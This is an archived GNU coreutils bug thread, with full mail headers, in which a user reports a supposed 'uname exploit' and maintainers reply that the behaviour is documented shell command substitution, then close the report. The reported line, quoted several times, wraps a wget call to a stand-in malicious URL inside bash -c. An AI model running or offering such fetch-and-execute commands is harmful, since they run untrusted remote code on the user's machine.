From debbugs-submit-bounces@debbugs.gnu.org Mon Aug 29 11:27:07 2016 Received: (at submit) by debbugs.gnu.org; 29 Aug 2016 15:27:07 +0000 Received: from localhost ([127.0.0.1]:43715 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOSp-0000fu-JT for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:27:07 -0400 Received: from eggs.gnu.org ([208.118.235.92]:39474) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beGwc-0004OC-B4 for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:22 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwW-0002vP-DW for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:17 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,FREEMAIL_FROM, T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:56604) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwW-0002vJ-Ac for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:16 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:58676) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwU-0001EI-7F for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:15 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwQ-0002uk-3Q for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:13 -0400 Received: from mail-oi0-x236.google.com ([2607:f8b0:4003:c06::236]:33382) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwP-0002uH-Rm for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:10 -0400 Received: by mail-oi0-x236.google.com with SMTP id c15so185074096oig.0 for ; Mon, 29 Aug 2016 00:25:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=to:from:subject:message-id:date:user-agent:mime-version :content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=kxcgfVV4Lo0PFHQoKDswA8mowDuuYQLhr/fNUO6f0cxpMyzejweGTDbilCEDYGbvDe IFtQUocDZZRW2DofdmBfxHlXgF50ZAHj1LOdP6fahinr6xaJp/lI4hJysSH4d/yZ2MBa PuGxZlwRkTVjyl1Cq4w7qC+TXpvOKHbxRAMVhIIat0fNCEwHMa39LXuGxcXjKdTVXEMJ mdU3SFuuPanuNam+oA6x+7p3e5GntJbG1+TYAqRBIrQcPEfa5CaXF35ilVwQXWZCG7we nbhW243f9Y6sWUmRJ0W+S7WDe44qt0jJ7uTLe49k54ts7lkeFs6wkVAJCYIfn68O7V9D 8dww== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:to:from:subject:message-id:date:user-agent :mime-version:content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=KRlFA4Z6xNzSy+oQzB2mneYFljh1nPVdZhYK2dIFiO/Feyd3DhkBMm1pDSpRDSXFG/ jTgXUyCwHKmhXidyvlXrUx/U5/+LLoonG066yD/EN5GbWNQDLeS7Wg4uUZZHwQ4sDAED MgEWt6+gSuHx7gFCXC3kEzBd2yqYw54Ajs5NgWz9LH+6a9ziNIVt0PBqUSPfQtlxF0Xc srTUWr+YuQoBFmCBVH+w4fGZjHBZcw1D9KZDzn0Eqvgg2vFqQ8Iepfm5MMrV4QK8Wj+G BSo+IT1WguWzfZsbSU/QwjRcgY/Bkhoz3hKvSzCddcQGy3l0i/2pvhiMFgrIYKUe6PUv 9Zbg== X-Gm-Message-State: AE9vXwPM/Xexc1a9DDfWecy0woTJ7Y/B36umarnA97Pimi1Fa0pcrAmdGP0tl2mo8zz6RQ== X-Received: by 10.157.20.73 with SMTP id h67mr11005296oth.60.1472455508305; Mon, 29 Aug 2016 00:25:08 -0700 (PDT) Received: from [192.168.1.140] (ip68-13-79-198.om.om.cox.net. [68.13.79.198]) by smtp.gmail.com with ESMTPSA id x203sm14421483oix.12.2016.08.29.00.25.07 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 29 Aug 2016 00:25:07 -0700 (PDT) To: bug-coreutils@gnu.org From: Shane Subject: uname exploit Message-ID: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Date: Mon, 29 Aug 2016 02:25:03 -0500 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -4.0 (----) X-Debbugs-Envelope-To: submit X-Mailman-Approved-At: Mon, 29 Aug 2016 11:27:06 -0400 X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -4.0 (----) Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" From debbugs-submit-bounces@debbugs.gnu.org Mon Aug 29 11:49:02 2016 Received: (at submit) by debbugs.gnu.org; 29 Aug 2016 15:49:02 +0000 Received: from localhost ([127.0.0.1]:43741 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOo2-0001Fp-4q for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:49:02 -0400 Received: from eggs.gnu.org ([208.118.235.92]:51314) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOmo-0001DM-E4 for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:46 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beOmi-0005Nn-As for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:41 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=BAYES_40,T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:33459) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmi-0005NT-5X for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:40 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:42268) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmf-0001gH-SR for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:38 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beOmc-0005Ll-Mz for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:37 -0400 Received: from out4-smtp.messagingengine.com ([66.111.4.28]:57462) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmb-0005Jc-Bc for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:34 -0400 Received: from compute4.internal (compute4.nyi.internal [10.202.2.44]) by mailout.nyi.internal (Postfix) with ESMTP id A57FA2060B for ; Mon, 29 Aug 2016 11:47:22 -0400 (EDT) Received: from web4 ([10.202.2.214]) by compute4.internal (MEProxy); Mon, 29 Aug 2016 11:47:22 -0400 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=content-transfer-encoding:content-type :date:from:in-reply-to:message-id:mime-version:references :subject:to:x-sasl-enc:x-sasl-enc; s=smtpout; bh=/BI2jIseQOenmRF /I3Z6dSg/MFA=; b=Tl1F4YtuvnYwG+jBqmLUY78nruRysG4rn4K55Ue0YU8uZNn +wHYRMfWR90uY/xjGLlYOYtzHV1zJprGC8ej8Rvg+WjbgJx9lc9axgPYXrHCKGZ2 Ko9mf9I4stJ6F3P7r7DqjzFJGf34rf5rw+HRnQe32Jk964IXHMhve06I/UIQ= Received: by mailuser.nyi.internal (Postfix, from userid 99) id 71AE3CC803; Mon, 29 Aug 2016 11:47:22 -0400 (EDT) Message-Id: <1472485642.3217795.709298825.3960D2F0@webmail.messagingengine.com> X-Sasl-Enc: btH2KqIGMB6SCieU2ra1SLhGTnm6fF6u7o1tXSZUSa2J 1472485642 From: Evan J Johnson To: bug-coreutils@gnu.org MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain X-Mailer: MessagingEngine.com Webmail Interface - ajax-5778c97d In-Reply-To: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> References: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Subject: Re: bug#24328: uname exploit Date: Mon, 29 Aug 2016 08:47:22 -0700 X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -5.0 (-----) X-Debbugs-Envelope-To: submit X-Mailman-Approved-At: Mon, 29 Aug 2016 11:49:00 -0400 X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -5.0 (-----) Hey Shane, I'm no bash/systems/coreutils expert, but I believe this behavior is completely expected, independent of uname, and documented. $(...) is the command substitution syntax and it will cause the command inside the parens to be run, with the output used as input. Here's a link to the behavior on gnu.org. https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution It won't work if you use single quotes, which is also expected. Evan On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote: > Hi, I am unsure if you have seen this, but I am concerned about this - > can or should uname be restricted to root use only? > > uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" > > > > > From debbugs-submit-bounces@debbugs.gnu.org Mon Aug 29 11:58:49 2016 Received: (at 24328-done) by debbugs.gnu.org; 29 Aug 2016 15:58:49 +0000 Received: from localhost ([127.0.0.1]:43795 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOxV-0001VM-Cg for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:58:49 -0400 Received: from zimbra.cs.ucla.edu ([131.179.128.68]:54428) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOxT-0001V8-AU for 24328-done@debbugs.gnu.org; Mon, 29 Aug 2016 11:58:47 -0400 Received: from localhost (localhost [127.0.0.1]) by zimbra.cs.ucla.edu (Postfix) with ESMTP id 5C4F81601CD; Mon, 29 Aug 2016 08:58:41 -0700 (PDT) Received: from zimbra.cs.ucla.edu ([127.0.0.1]) by localhost (zimbra.cs.ucla.edu [127.0.0.1]) (amavisd-new, port 10032) with ESMTP id q9n8RUoRKMGk; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by zimbra.cs.ucla.edu (Postfix) with ESMTP id 84A9516107E; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) X-Virus-Scanned: amavisd-new at zimbra.cs.ucla.edu Received: from zimbra.cs.ucla.edu ([127.0.0.1]) by localhost (zimbra.cs.ucla.edu [127.0.0.1]) (amavisd-new, port 10026) with ESMTP id cm7VeDkSvhTp; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Received: from [192.168.1.9] (unknown [100.32.155.148]) by zimbra.cs.ucla.edu (Postfix) with ESMTPSA id 67BE01601CD; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Subject: Re: bug#24328: uname exploit To: Shane , 24328-done@debbugs.gnu.org References: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> From: Paul Eggert Organization: UCLA Computer Science Department Message-ID: Date: Mon, 29 Aug 2016 08:58:40 -0700 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Score: -1.5 (-) X-Debbugs-Envelope-To: 24328-done X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -1.5 (-) Shane wrote: > uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" I don't see a bug here, so I'm marking this as done. From unknown Tue Aug 19 21:03:15 2025 Received: (at fakecontrol) by fakecontrolmessage; To: internal_control@debbugs.gnu.org From: Debbugs Internal Request Subject: Internal Control Message-Id: bug archived. Date: Tue, 27 Sep 2016 11:24:03 +0000 User-Agent: Fakemail v42.6.9 # This is a fake control message. # # The action: # bug archived. thanks # This fakemail brought to you by your local debbugs # administrator